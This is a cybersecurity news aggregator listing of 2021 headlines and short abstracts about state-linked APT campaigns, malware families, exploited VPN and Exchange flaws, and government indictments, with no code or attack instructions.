Trend Micro researchers stumbled across a cyberespionage campaign by Earth Baku, or APT41, compromising public and private entities alike located in the Indo-Pacific region. The group deploys previously unknown shellcode loaders, now known as StealthVector and StealthMutant, along with a backdoor i ... Read MoreCyware Alerts - Hacker News
August 19, 2021
NK-linked InkySquid APT leverages IE exploits in recent attacks Full Text
Abstract
North Korea-linked InkySquid group leverages two Internet Explorer exploits to deliver a custom implant in attacks aimed at a South Korean online newspaper. Experts from cybersecurity firm Volexity reported that North Korea-linked InkySquid group...Security Affairs
August 11, 2021
UNC215, an alleged China-linked APT group targets Israel orgs Full Text
Abstract
China-linked threat actors UNC215 targeted Israeli organizations in a long-running campaign and used false flags to trick victims into believing the attacks was from Iran. A China-linked cyber-espionage group has targeted Israeli organizations and government...Security Affairs
August 4, 2021
New Infrastructure Linked to APT29’s WellMess Malware Full Text
Abstract
RiskIQ laid bare more than 30 active C&C servers delivering WellMess and WellMail malware, allegedly owned by Russian-speaking attack group APT29. It is infamous for targeted attacks aimed at U.S. organizations. Federal agencies and organizations are suggested to stay vigilant, focus on pr ... Read MoreCyware Alerts - Hacker News
August 4, 2021
China-linked APT31 targets Russia for the first time Full Text
Abstract
China-linked APT31 group employed a new strain of malware in attacks aimed at entities in Mongolia, Belarus, Canada, the US, and Russia. Researchers from Positive Technologies reported that China-linked APT31 group has been using a new piece of malware...Security Affairs
August 3, 2021
Iranian APT Lures Defense Contractor in Catfishing-Malware Scam Full Text
Abstract
Fake aerobics-instructor profile delivers malware in a supply-chain attack attempt from TA456.Threatpost
August 3, 2021
China-linked APT groups target telecom companies in Southeast Asia Full Text
Abstract
China linked APT groups have targeted networks of at least five major telecommunications companies operating in Southeast Asia since 2017. Cybereason researchers identified three clusters of activity associated with China-linked threat actors...Security Affairs
August 3, 2021
GhostEmperor - Another Chinese APT Group Targeting Southeast Asia Full Text
Abstract
Kaspersky documented a new Chinese-speaking threat actor—GhostEmperor—targeting Microsoft Exchange flaws in high-profile attacks in Southeast Asia. The group uses a formerly unknown Windows kernel-mode rootkit to gain remote control over targeted servers. Recently, several Chinese APT groups have b ... Read MoreCyware Alerts - Hacker News
August 3, 2021
China-linked APTs Launched DeadRinger Campaign to Strike Major Telecommunications Companies in Southeast Asia Full Text
Abstract
Cybereason believes the attacks are the work of advanced persistent threat (APT) groups linked to Chinese state-sponsorship due to overlaps in tactics and techniques with other known Chinese APTs.ZDNet
August 02, 2021
New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits Full Text
Abstract
A new highly capable and persistent threat actor has been targeting major high-profile public and private entities in the U.S. as part of a series of targeted cyber intrusion attacks by exploiting internet-facing Microsoft Internet Information Services ( IIS ) servers to infiltrate their networks. Israeli cybersecurity firm Sygnia, which identified the campaign, is tracking the advanced, stealthy adversary under the moniker "Praying Mantis" or "TG2021." "TG1021 uses a custom-made malware framework, built around a common core, tailor-made for IIS servers. The toolset is completely volatile, reflectively loaded into an affected machine's memory and leaves little-to-no trace on infected targets," the researchers said . "The threat actor also uses an additional stealthy backdoor and several post-exploitations modules to perform network reconnaissance, elevate privileges, and move laterally within networks." Besides exhibiting capabilitiesThe Hacker News
July 29, 2021
Praying Mantis is now Preying on Microsoft’s IIS Servers Full Text
Abstract
Sygnia researchers reported a new APT group—Praying Mantis or TG1021—targeting Microsoft IIS web servers to reach victims’ internal networks to steal sensitive data. To stay protected, researchers recommend patching .NET deserialization vulnerabilities and scanning internet-facing IIS servers with ... Read MoreCyware Alerts - Hacker News
July 27, 2021
APT Group Praying Mantis Hits IIS Web Servers with Deserialization Flaws and Memory Resident Malware Full Text
Abstract
A sophisticated, likely government-sponsored threat actor has been compromising major public and private organizations over the past year by exploiting deserialization flaws in public-facing ASP.NET applications to deploy fileless malware.CSO Online
July 22, 2021
APT Hackers Distributed Android Trojan via Syrian e-Government Portal Full Text
Abstract
An advanced persistent threat (APT) actor has been tracked in a new campaign deploying Android malware via the Syrian e-Government Web Portal, indicating an upgraded arsenal designed to compromise victims. "To the best of our knowledge, this is the first time that the group has been publicly observed using malicious Android applications as part of its attacks," Trend Micro researchers Zhengyu Dong, Fyodor Yarochkin, and Steven Du said in a technical write-up published Wednesday. StrongPity , also codenamed Promethium by Microsoft, is believed to have been active since 2012 and has typically focused on targets across Turkey and Syria. In June 2020, the espionage threat actor was connected to a wave of activities that banked on watering hole attacks and tampered installers, which abuse the popularity of legitimate applications, to infect targets with malware. "Promethium has been resilient over the years," Cisco Talos disclosed last year. "Its campaiThe Hacker News
July 21, 2021
France ANSSI agency warns of APT31 campaign against French organizations Full Text
Abstract
French cyber-security agency ANSSI warned of an ongoing cyberespionage campaign aimed at French organizations carried out by China-linked APT31 group. The French national cyber-security agency ANSSI warned of ongoing attacks against a large number...Security Affairs
July 21, 2021
StrongPity APT Group Deploys Android Malware for the First Time Full Text
Abstract
Trend Micro conducted an investigation into a malicious Android malware sample, which is believed to be linked to the StrongPity APT group, that was posted on the Syrian e-Gov website.Trend Micro
July 21, 2021
France warns of APT31 cyberspies targeting French organizations Full Text
Abstract
The French national cyber-security agency today warned of an ongoing series of attacks against a large number of French organizations coordinated by the Chinese-backed APP31 cyberespionage group.BleepingComputer
July 19, 2021
US indicts members of Chinese-backed hacking group APT40 Full Text
Abstract
Today, the US Department of Justice (DOJ) indicted four members of the Chinese state-sponsored hacking group known as APT40 for hacking various companies, universities, and government entities in the US and worldwide between 2011 and 2018.BleepingComputer
July 17, 2021
LuminousMoth - Another Chinese APT Targeting Asian Governments Full Text
Abstract
Kaspersky discovered an ongoing, large-scale APT campaign named LuminousMoth with hundreds of victims from Southeast Asia, including Myanmar and the Philippines government entities. The recent activities of the APT group indicate the wider interests of China-based hackers toward Southeast Asian gov ... Read MoreCyware Alerts - Hacker News
July 16, 2021
The Definitive RFP Templates for EDR/EPP and APT Protection Full Text
Abstract
Advanced Persistent Threats groups were once considered a problem that concerns Fortune 100 companies only. However, the threat landscape of the recent years tells otherwise—in fact, every organization, regardless of vertical and size is at risk, whether as a direct target, supply chain or collateral damage. The vast majority of security decision-makers acknowledge they need to address the APT risk with additional security solutions but struggle with mapping APT attack vectors to a clear-cut set of security product capabilities, which impairs their ability to choose the products that would best protect them. Cynet is now addressing this need with the definitive RFP templates for EDR/EPP and APT Protection , an expert-made security requirement list, that enables stakeholders to accelerate and optimize the evaluation process of the products they evaluate. These RFP templates aim to capture the widest common denominator in terms of security needs and deliver the essential that areThe Hacker News
July 15, 2021
Charming Kitten APT is Now Targeting Middle-East Scholars Full Text
Abstract
Iranian state-aligned threat actor TA453 hacked a website pertaining to the University of London, to steal information of journalists, professors, and think tanks, under a campaign dubbed SpoofedScholars. The APT group is continuously innovating and developing new ways of attacking users. Organizat ... Read MoreCyware Alerts - Hacker News
July 14, 2021
China-linked LuminousMoth APT targets entities from Southeast Asia Full Text
Abstract
LuminousMoth: Kaspersky uncovered an ongoing and large-scale APT campaign that targeted government entities in Southeast Asia, including Myanmar and the Philippines. Kaspersky experts uncovered an ongoing and large-scale cyber espionage campaign,...Security Affairs
July 14, 2021
Chinese cyberspies’ wide-scale APT campaign hits Asian govt entities Full Text
Abstract
Kaspersky researchers have revealed an ongoing and large-scale advanced persistent threat (APT) campaign with hundreds of victims from Southeast Asia, including Myanmar and the Philippines government entities.BleepingComputer
July 13, 2021
‘Charming Kitten’ APT Siphons Intel From Mid-East Scholars Full Text
Abstract
Professors, journalists and think-tank personnel, beware strangers bearing webinars: It’s the focus of a particularly sophisticated, and chatty, phishing campaign.Threatpost
July 9, 2021
WildPressure APT Group is Continuously Sharpening its Tools Full Text
Abstract
Kaspersky spotted WildPressure APT group deploying a new malware to target businesses in the oil and gas sector, through both Windows and macOS systems. Experts also noted some similarities in the techniques of the WildPressure APT and BlackShadow, which also targets organizations in the Middl ... Read MoreCyware Alerts - Hacker News
July 7, 2021
WildPressure APT expands operations targeting the macOS platform Full Text
Abstract
WildPressure APT is targeting industrial organizations in the Middle East since 2019 and was spotted using now a new malware that targets both Windows and macOS. Researchers from Kaspersky have spotted a new malware used by the WildPressure APT group...Security Affairs
July 7, 2021
MacOS Targeted in WildPressure APT Malware Campaign Full Text
Abstract
Threat actors enlist compromised WordPress websites in campaign targeting macOS users.Threatpost
July 07, 2021
WildPressure APT Emerges With New Malware Targeting Windows and macOS Full Text
Abstract
A malicious campaign that has set its sights on industrial-related entities in the Middle East since 2019 has resurfaced with an upgraded malware toolset to strike both Windows and macOS operating systems, symbolizing an expansion in both its targets and its strategy around distributing threats. Russian cybersecurity firm attributed the attacks to an advanced persistent threat (APT) it tracks as " WildPressure ," with victims believed to be in the oil and gas industry. WildPressure first came to light in March 2020 based off of a malware operation distributing a fully-featured C++ Trojan dubbed "Milum" that enabled the threat actor to gain remote control of the compromised device. The attacks were said to have begun as early as August 2019. "For their campaign infrastructure, the operators used rented OVH and Netzbetrieb virtual private servers (VPS) and a domain registered with the Domains by Proxy anonymization service," Kaspersky researcher DenisThe Hacker News
July 7, 2021
Russian Cozy Bear APT Group Allegedly Breached Republican National Committee via Third-party Provider Full Text
Abstract
The hacker group has been tied to Russia’s foreign intelligence service and has previously been accused of breaching the Democratic National Committee in 2016 and SolarWinds more recently.Bloomberg
July 7, 2021
WildPressure APT Group Targets the macOS Platform with New Python Trojan Full Text
Abstract
The versioning system shows that the malware used by WildPressure is still under active development. Besides commercial VPS, this time the operators used compromised legitimate WordPress websites.Kaspersky Labs
July 01, 2021
IndigoZebra APT Hacking Campaign Targets the Afghan Government Full Text
Abstract
Cybersecurity researchers are warning of ongoing attacks coordinated by a suspected Chinese-speaking threat actor targeting the Afghanistan government as part of an espionage campaign that may have had its provenance as far back as 2014. Israeli cybersecurity firm Check Point Research attributed the intrusions to a hacking group tracked under the moniker "IndigoZebra," with past activity aimed at other central-Asian countries, including Kyrgyzstan and Uzbekistan. "The threat actors behind the espionage leveraged Dropbox, the popular cloud-storage service, to infiltrate the Afghan National Security Council (NSC)," the researchers said in a technical write-up shared with The Hacker News, adding they "orchestrated a ministry-to-ministry style deception, where an email is sent to a high-profile target from the mailboxes of another high-profile victim." IndigoZebra first came to light in August 2017 when Kaspersky detailed a covert operation that singleThe Hacker News
July 1, 2021
UK, US agencies warn of large-scale brute-force attacks carried out by Russian APT Full Text
Abstract
US and UK cybersecurity agencies said the Russia-linked APT28 group is behind a series of large-scale brute-force attacks.US and UK cybersecurity agencies said today that a Russian military cyber unit has been behind a series of brute-force attacks that...Security Affairs
June 29, 2021
Cobalt Strike: Favorite Tool from APT to Crimeware Full Text
Abstract
Cobalt Strike is a legitimate penetration testing tool used by security professionals to emulate malicious activity in a network. However, threat actors are increasingly abusing the tool.Proofpoint
June 22, 2021
South Korean Nuclear Research Agency Targeted by APT Group Full Text
Abstract
Nuclear energy and arms-related organizations are under attack from several other APT groups across the globe. A North Korean APT group recently breached the internal network of the Korea Atomic Energy Research Institute (KAERI), South Korea through a vulnerability in a VPN server last month.Cyware Alerts - Hacker News
June 20, 2021
Norway blames China-linked APT31 for 2018 government hack Full Text
Abstract
Norway police secret service states said that China-linked APT31 group was behind the 2018 cyberattack on the government’s IT network. Norway’s Police Security Service (PST) said that the China-linked APT31 cyberespionage group was behind the attack...Security Affairs
June 19, 2021
North Korean APT group Kimsuky allegedly hacked South Korea’s atomic research agency KAERI Full Text
Abstract
North Korea-linked APT group Kimsuky allegedly breached South Korea’s atomic research agency KAERI by exploiting a VPN vulnerability. South Korean representatives declared on Friday that North Korea-linked APT group Kimsuky is believed to have breached...Security Affairs
June 18, 2021
The return of TA402 Molerats APT after a short pause Full Text
Abstract
TA402 APT group (aka Molerats and GazaHackerTeam) is back after two-month of silence and is targeting governments in the Middle East. The TA402 APT group (aka Molerats and Gaza Cybergang) is back after a two-month of apparent inactivity, it is targeting...Security Affairs
June 17, 2021
Ferocious Kitten APT targets Telegram and Psiphon VPN users in Iran Full Text
Abstract
Iran-linked Ferocious Kitten APT group used instant messaging apps and VPN software like Telegram and Psiphon to deliver Windows RAT and spy on targets' devices. Researchers from Kaspersky reported that Iran-linked threat actors, tracked as Ferocious...Security Affairs
June 15, 2021
Microsoft Defender ATP now warns of jailbroken iPhones, iPads Full Text
Abstract
Microsoft has added support for detecting jailbroken iOS devices to Microsoft Defender for Endpoint, the enterprise version of its Windows 10 Defender antivirus.BleepingComputer
June 13, 2021
BackdoorDiplomacy APT targets diplomats from Africa and the Middle East Full Text
Abstract
ESET researchers discovered an advanced persistent threat (APT) group, tracked as BackdoorDiplomacy, that is targeting diplomats across Africa and the Middle East. ESET researchers spotted a new state-sponsored group, dubbed BackdoorDiplomacy,...Security Affairs
June 8, 2021
New SkinnyBoy Malware Linked with APT28 Full Text
Abstract
Cluster25 found a new SkinnyBoy malware that has been used by the APT28 group in multiple spear-phishing campaigns against military and government institutions in the U.S. and Europe. The malware has a low level of sophistication, however, it can not be taken lightly as this could be in its early s ... Read MoreCyware Alerts - Hacker News
June 7, 2021
Novel ‘Victory’ Backdoor Spotted in Chinese APT Campaign Full Text
Abstract
Researchers said the malware has been under development for at least three years.Threatpost
June 7, 2021
Kimsuky APT Group is Evolving; A Matter to be Worried About Full Text
Abstract
North Korean APT group Kimsuky, also known as Thallium, Black Banshee, and Velvet Chollim, has been found adopting new TTPs as it continues to launch espionage attacks.Cyware Alerts - Hacker News
June 6, 2021
Chinese SharpPanda APT developed a new backdoor in the last 3 years Full Text
Abstract
Check Point Research (CPR) said that the Chinese APT group SharpPanda spent three years developing a new backdoor to spy on Asian governments. Researchers from Check Point Research (CPR) discovered a new backdoor while investigating a cyber espionage...Security Affairs
June 3, 2021
Chinese APT Groups Launching Backdoor Attacks to Spy on Southeast Asian Governments Full Text
Abstract
Check Point Research said that the backdoor has been designed, developed, tested, and deployed over the past three years to compromise a Southeast Asian nation's Ministry of Foreign Affairs.ZDNet
June 2, 2021
Another APT Group Piercing into U.S. Local Government Networks Full Text
Abstract
Foreign hackers made their way into the webserver of a local U.S. municipal government after exploiting vulnerabilities in an unpatched Fortinet VPN appliance. The FBI shared IOCs for the same.Cyware Alerts - Hacker News
June 2, 2021
US seizes 2 domains used by APT29 in a recent phishing campaign Full Text
Abstract
The US DoJ seized two domains used by APT29 group in recent attacks impersonating the U.S. USAID to spread malware. The US Department of Justice (DoJ) and the Federal Bureau of Investigation have seized two domains used by the Russia-linked APT29...Security Affairs
June 2, 2021
Kimsuky APT Continues to Target South Korean Government Using AppleSeed Backdoor Full Text
Abstract
The Kimsuky APT—also known as Thallium, Black Banshee, and Velvet Chollima—is a North Korean threat actor that has been active since 2012. It conducts cyber espionage operations against South Korea.Malwarebytes Labs
June 01, 2021
US seizes domains used by APT29 in recent USAID phishing attacks Full Text
Abstract
The US Department of Justice has seized two Internet domains used in recent phishing attacks impersonating the U.S. Agency for International Development (USAID) to distribute malware and gain access to internal networks.BleepingComputer
May 29, 2021
Chinese APT Groups Continue to Pound Away on Pulse Secure VPNs Full Text
Abstract
Multiple threat groups believed to be working in support of China's long-term economic interests are continuing to hammer away at networks belonging to organizations in the US and Europe.Dark Reading
May 28, 2021
China-linked APT groups targets orgs via Pulse Secure VPN devices Full Text
Abstract
Researchers from FireEye warn that China-linked APT groups continue to target Pulse Secure VPN devices to compromise networks. Cybersecurity researchers from FireEye warn once again that Chinese APT groups continue to target Pulse Secure VPN devices...Security Affairs
May 28, 2021
Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices Full Text
Abstract
Mandiant identified 16 malware families exclusively designed to infect Pulse Secure VPN appliances and used by several cyberespionage groups which are believed to be linked to the Chinese government.FireEye
May 28, 2021
Microsoft Suspects Russia’s Cozy Bear APT Behind Attack Against U.S. Aid Agency Full Text
Abstract
By breaching the systems of a supplier used by the federal government, the hackers sent out genuine-looking emails to more than 3,000 accounts across more than 150 organizations linked to USAID.New York Times
May 27, 2021
APT hacked a US municipal government via an unpatched Fortinet VPN Full Text
Abstract
The FBI revealed that foreign hackers compromised the network of a local US municipal government by exploiting flaws in an unpatched Fortinet VPN. The Federal Bureau of Investigation (FBI) reported that an APT group had breached the network of a local...Security Affairs
May 27, 2021
FBI: APT hackers breached US local govt by exploiting Fortinet bugs Full Text
Abstract
The Federal Bureau of Investigation (FBI) says the webserver of a US municipal government was breached by state-sponsored attackers after hacking a Fortinet appliance.BleepingComputer
May 16, 2021
Pakistan-linked Transparent Tribe APT expands its arsenal Full Text
Abstract
Alleged Pakistan-Linked cyber espionage group, tracked as Transparent Tribe, targets Indian entities with a new Windows malware. Researchers from Cisco Talos warn that the Pakistan-linked APT group Transparent Tribe expanded its Windows malware arsenal....Security Affairs
May 13, 2021
Transparent Tribe APT Expands its Windows Malware Arsenal with ObliqueRAT Full Text
Abstract
Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations.Cisco Talos
May 11, 2021
10 APT groups that joined the MS Exchange exploitation party Full Text
Abstract
Research by ESET showed that the vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 were exploited by at least 10 APT groups since the release of the patches.Cyber News
May 8, 2021
Russian cyber-spies changed tactics after the UK and US outed their techniques – so here’s a list of those changes Full Text
Abstract
Russian spies from APT29 responded to Western agencies outing their tactics by adopting a red-teaming tool to blend into targets' networks as a legitimate pentesting exercise.The Register
May 7, 2021
Russia-linked APT29 group changes TTPs following April advisories Full Text
Abstract
The UK and US cybersecurity agencies have published a report detailing techniques used by Russia-linked cyberespionage group known APT29 (aka Cozy Bear). Today, UK NCSC and CISA-FBI-NSA cybersecurity agencies published a joint security advisory that...Security Affairs
May 6, 2021
Chinese APT Groups Targeting Russian Defense Contractors Full Text
Abstract
Hackers infiltrated the systems of Rubin Central Design Bureau for Marine Engineering, a Russian submarine design firm, using a new malware called PortDoor. It is suspected that Chinese actors could be behind the attack.Cyware Alerts - Hacker News
May 6, 2021
Chinese PLA Unit 61419 suspected to have purchased AVs for cyber-espionage Full Text
Abstract
Chinese military unit PLA Unit 61419 is suspected to be involved in cyber-espionage campaigns against multiple antivirus companies. Researchers from cybersecurity firm Recorded Future’s Insikt Group have discovered six procurement documents from...Security Affairs
May 3, 2021
Naikon APT Group is Now Using Nebulae Backdoor Full Text
Abstract
Researchers uncovered mischievous activities by the Naikon hacking group, which has been deploying a new backdoor against military organizations in Southeast Asia for over two years.Cyware Alerts - Hacker News
May 3, 2021
Russia-Linked SVR APT Group Exploiting Five Known Vulnerabilities Full Text
Abstract
A joint advisory by the FBI, CISA, and NSA disclosed that the Russian APT group is exploiting flaws in Fortinet, Zimbra, Citrix, Pulse Secure, and VMware solutions to obtain login credentials.Cyware Alerts - Hacker News
April 30, 2021
China-linked APT uses a new backdoor in attacks at Russian defense contractor Full Text
Abstract
China-linked APT group targets Russian nuclear sub designer with an undocumented backdoor A China-linked cyberespionage group targets a Russian defense contractor involved in designing nuclear submarines for the Russian Navy. Cybereason researchers...Security Affairs
April 28, 2021
Naikon APT group uses new Nebulae backdoor in attacks aimed at military orgs Full Text
Abstract
China-linked APT Naikon employed a new backdoor in multiple cyber-espionage operations targeting military organizations from Southeast Asia in the last 2 years. The Naikon APT group is a China-linked cyber espionage group that has been active...Security Affairs
April 27, 2021
An APT Group Exploits VPN to Deploy Supernova on SolarWinds Orion Full Text
Abstract
The U.S. CISA has disclosed details of a new APT that leverages the Supernova backdoor to compromise SolarWinds Orion installations after gaining access to the network through a VPN service.Cyware Alerts - Hacker News
April 21, 2021
Japanese Law Enforcement Names Chinese Military Linked Tick APT to Hundreds of Breaches Full Text
Abstract
Japanese law enforcement believes a group of hackers linked to the Chinese military are behind a broad cyber-espionage campaign that has breached more than 200 Japanese companies since at least 2016.The Record
April 21, 2021
China-linked APT used Pulse Secure VPN zero-day to hack US defense contractors Full Text
Abstract
At least one China-linked APT group exploited a new zero-day flaw in Pulse Secure VPN equipment to break into the networks of US defense contractors. According to coordinated reports published by FireEye and Pulse Secure, two hacking groups have...Security Affairs
April 21, 2021
Multiple APT Groups Exploit Critical Pulse Secure Zero-Day Full Text
Abstract
Customers urged to take immediate action against nation state threatInfosecurity Magazine
April 20, 2021
North Korea-linked Lazarus APT hides malicious code within BMP image to avoid detection Full Text
Abstract
North Korea-linked Lazarus APT group is abusing bitmap (.BMP) image files in a recent spear-phishing campaign targeting entities in South Korea. Experts from Malwarebytes have uncovered a spear-phishing attack conducted by a North Korea-linked Lazarus...Security Affairs
April 19, 2021
Lazarus APT Hackers are now using BMP images to hide RAT malware Full Text
Abstract
A spear-phishing attack operated by a North Korean threat actor targeting its southern counterpart has been found to conceal its malicious code within a bitmap (.BMP) image file to drop a remote access trojan (RAT) capable of stealing sensitive information. Attributing the attack to the Lazarus Group based on similarities to prior tactics adopted by the adversary, researchers from Malwarebytes said the phishing campaign started by distributing emails laced with a malicious document that it identified on April 13. "The actor has used a clever method to bypass security mechanisms in which it has embedded its malicious HTA file as a compressed zlib file within a PNG file that then has been decompressed during run time by converting itself to the BMP format," Malwarebytes researchers said . "The dropped payload was a loader that decoded and decrypted the second stage payload into memory. The second stage payload has the capability to receive and execute commandsThe Hacker News
April 19, 2021
Iron Tiger APT Group Roars Louder With New Toolkit Full Text
Abstract
Iron Tiger threat actor group was spotted using an upgraded toolkit in an 18-month old cyberespionage campaign against a gambling firm in the Philippines.Cyware Alerts - Hacker News
April 16, 2021
Russia-linked APT SVR actively targets these 5 flaws Full Text
Abstract
The US government warned that Russian cyber espionage group SVR is exploiting five known vulnerabilities in enterprise infrastructure products. The U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal...Security Affairs
April 9, 2021
APTs Exploiting Fortinet VPN Security Vulnerabilities - Cybersecurity Agencies Warn Full Text
Abstract
Nation-state APTs are actively exploiting known vulnerabilities in the Fortinet FortiOS cybersecurity OS to gain initial access to multiple government, commercial, and technology services.Cyware Alerts - Hacker News
April 8, 2021
New APT27 Cyberespionage Campaign Unveiled Full Text
Abstract
Kaspersky spotted a cyberespionage campaign targeted against government and military organizations in Vietnam via DLL side-loading.Cyware Alerts - Hacker News
April 7, 2021
APT Group Using Voice Changing Software in Spear-Phishing Campaign Full Text
Abstract
A sub-group of the 'Molerats' threat-actor has been using voice-changing software to successfully trick targets into installing malware, according to a warning from Cado Security.Security Week
April 6, 2021
Chinese Cycldek APT targets Vietnamese Military and Government in sophisticated attacks Full Text
Abstract
China-linked APT group Cycldek is behind an advanced cyberespionage campaign targeting entities in the government and military sector in Vietnam. China-linked APT group LuckyMouse (aka Cycldek, Goblin Panda, Hellsing, APT 27, and Conimes) is targeting...Security Affairs
April 5, 2021
A41APT: An APT Campaign, a Multi-Layer Malware, and Japanese Targets Full Text
Abstract
The activity related to the campaign was first observed in November 2020 when reports of Japan-linked organizations being targeted in 17 regions across the world emerged.Cyware Alerts - Hacker News
April 2, 2021
FBI and CISA are warning of APT actors targeting Fortinet FortiOS servers Full Text
Abstract
FBI and CISA published a joint alert to warn of advanced persistent threat (APT) groups targeting Fortinet FortiOS to access networks of multiple organizations. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security...Security Affairs
April 2, 2021
APTs targeting Fortinet, CISA and FBI warn Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) and FBI issued a joint advisory Friday that advanced persistant threat groups are scanning for vulnerable Fortinet products. “It is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial, and technology services networks,” reads the advisory. The APTs, which CISA…SCMagazine
March 31, 2021
Calypso APT Eyes Microsoft Exchange Vulnerabilities Full Text
Abstract
The China-linked Calypso APT group was observed to be targeting vulnerable Microsoft Exchange servers to deploy web shells and eventually load the PlugX malware.Cyware Alerts - Hacker News
March 31, 2021
APT Charming Kitten Pounces on Medical Researchers Full Text
Abstract
Researchers uncover a credential-stealing campaign targeting genetic, neurology and oncology professionals.Threatpost
March 29, 2021
China-linked RedEcho APT took down part of its C2 domains Full Text
Abstract
China-linked APT group RedEcho has taken down its attack infrastructure after it was exposed at the end of February by security researchers. China-linked APT group RedEcho has taken down its attack infrastructure after security experts have exposed...Security Affairs
March 28, 2021
MuddyWater APT Goes Ham on its Targets Full Text
Abstract
This month, Trend Micro attributed the politically-motivated hacking group to a newly discovered cyber espionage campaign dubbed Earth Vetala.Cyware Alerts - Hacker News
March 25, 2021
Facebook took action against China-linked APT targeting Uyghur activists Full Text
Abstract
Facebook has closed accounts used by a China-linked APT to distribute malware to spy on Uyghurs activists, journalists, and dissidents living outside China. Facebook has taken action against a series of accounts used by a China-linked cyber-espionage...Security Affairs
March 23, 2021
What You Need to Know About Operation Diànxùn Full Text
Abstract
This cyber espionage campaign is targeting telecom companies since August 2020 and it has been attributed to the RedDelta threat actor, also known as TA416 and Mustang Panda.Cyware Alerts - Hacker News
March 19, 2021
APT31 Fingered for Cyber-Attack on Finnish Parliament Full Text
Abstract
Finland says its government was spied on by threat group with links to Chinese governmentInfosecurity Magazine
March 18, 2021
China-linked APT31 group was behind the attack on Finnish Parliament Full Text
Abstract
China-linked cyber espionage group APT31 is believed to be behind an attack on the Parliament of Finland that took place in 2020. China-linked cyber espionage group APT31 is believed to be behind an attack on the Parliament of Finland that took place...Security Affairs
March 17, 2021
China-based Mustang Panda APT Targets Telecom Companies to Steal 5G Secrets Full Text
Abstract
At least 23 telecommunications providers in Southeast Asia, Europe, and the United States, are suspected to have been targeted as part of the campaign that has been active since at least August 2020.ZDNet
March 15, 2021
What You Need to Know About RedEcho Full Text
Abstract
The victimology of this Chinese hacker group coincides with that of APT41, also known as Barium. Moreover, RedEcho boasts of a robust infrastructure.Cyware Alerts - Hacker News
March 15, 2021
Multiple APT Groups Now Targeting Microsoft Exchange Servers Full Text
Abstract
Several threat actors have been found exploiting the recently disclosed ProxyLogon vulnerabilities in Microsoft Exchange servers including APT27, LuckyMouse, Calypso, and Winnti Group.Cyware Alerts - Hacker News
March 13, 2021
The fire in the OVH datacenter also impacted APTs and cybercrime groups Full Text
Abstract
The fire at the OVH datacenter in Strasbourg also impacted the command and control infrastructure used by several nation-state APT groups and cybercrime gangs. OVH, one of the largest hosting providers in the world, has suffered this week a terrible...Security Affairs
March 11, 2021
RedXOR, a new powerful Linux backdoor in Winnti APT arsenal Full Text
Abstract
Intezer experts have spotted a new strain of Linux backdoor dubbed RedXOR that is believed to be part of the arsenal of China-linked Winniti APT. Researchers from Intezer have discovered a new sophisticated backdoor, tracked as RedXOR, that targets...Security Affairs
March 10, 2021
ESET: More Than 10 APT Groups Exploiting Recent Microsoft Exchange Vulnerabilities Full Text
Abstract
Security firm identifies more than 5000 email global servers affectedInfosecurity Magazine
March 7, 2021
Russia-linked APT groups exploited Lithuanian infrastructure to launch attacks Full Text
Abstract
Russia-linked APT groups leveraged the Lithuanian nation’s technology infrastructure to launch cyber-attacks against targets worldwide. The annual national security threat assessment report released by Lithuania’s State Security Department states...Security Affairs
March 3, 2021
Nation-State Hackers are Now Hiring Mercenary APT Groups Full Text
Abstract
A Blackberry report unveiled that state-backed actors often collaborate with mercenary APT groups to excel in attacks. Simultaneously, it helps state-backed actors lie low with their game plan.Cyware Alerts - Hacker News
March 2, 2021
Alleged China-linked APT41 group targets Indian critical infrastructures Full Text
Abstract
Recorded Future researchers uncovered a campaign conducted by Chinese APT41 group targeting critical infrastructure in India. Security researchers at Recorded Future have spotted a suspected Chinese APT actor targeting critical infrastructure operators...Security Affairs
February 26, 2021
Chinese Group APT31 Used NSA Exploit Three Years Before Shadow Brokers Leak Full Text
Abstract
A report revealed that a Chinese APT has been abusing a Windows zero-day exploit, stolen from the NSA’s Equation Group even before The Shadow Brokers group leaked it.Cyware Alerts - Hacker News
February 25, 2021
Old foe or new enemy? Here’s how researchers handle APT attribution Full Text
Abstract
Identifying a new actor is the first step in creating a defense, but attribution is hard to confirm due to use of common toolsets.SCMagazine
February 25, 2021
North Korea-linked Lazarus APT targets defense industry with ThreatNeedle backdoor Full Text
Abstract
North Korea-linked Lazarus APT group has targeted the defense industry with the custom-backdoor dubbed ThreatNeedle since 2020. North Korea-linked Lazarus APT group has targeted the defense industry with the backdoor dubbed ThreatNeedle since early...Security Affairs
February 24, 2021
Ukraine: nation-state hackers hit government document management system Full Text
Abstract
Ukraine 's government attributes a cyberattack on the government document management system to a Russia-linked APT group. The Ukraine 's government blames a Russia-linked APT group for an attack on a government document management system, the System...Security Affairs
February 24, 2021
APT32 state hackers target human rights defenders with spyware Full Text
Abstract
Vietnam-linked APT32 group targeted Vietnamese human rights defenders (HRDs) between February 2018 and November 2020. Vietnam-linked APT32 (aka Ocean Lotus) group has conducted a cyberespionage campaign targeting Vietnamese human rights defenders...Security Affairs
February 23, 2021
APT32 state hackers target human rights defenders with spyware Full Text
Abstract
Vietnam-backed hacking group APT32 has coordinated several spyware attacks targeting Vietnamese human rights defenders (HRDs) between February 2018 and November 2020.BleepingComputer
February 23, 2021
Cisco points to new tier of APT actors that behave more like cybercriminals Full Text
Abstract
New Cisco research shows that the Gamaredon group, traditionally associated with attacks against Ukraine, is willing to target anybody, unlike the traditional model of espionage focusing on a few defined regions or industries at a time.SCMagazine
February 18, 2021
French IT Providers Actively Targeted by Russian Sandworm APT Group Full Text
Abstract
The French information security agency (ANSSI) linked Russian group Sandworm with a three-year-long stealthy operation involving a breach of several French entities by exploiting an IT monitoring tool.Cyware Alerts - Hacker News
February 17, 2021
US DoJ charges three members of the North Korea-linked Lazarus APT group Full Text
Abstract
The US DOJ charged three members of the North Korea-linked Lazarus Advanced Persistent Threat (APT) group. The U.S. Justice Department indicted three North Korean military intelligence officials, members of the Lazarus APT group, for their involvement...Security Affairs
February 17, 2021
French Agency ANSSI Warns that Russia-linked Sandworm APT group Targeting Centreon Monitoring Software Full Text
Abstract
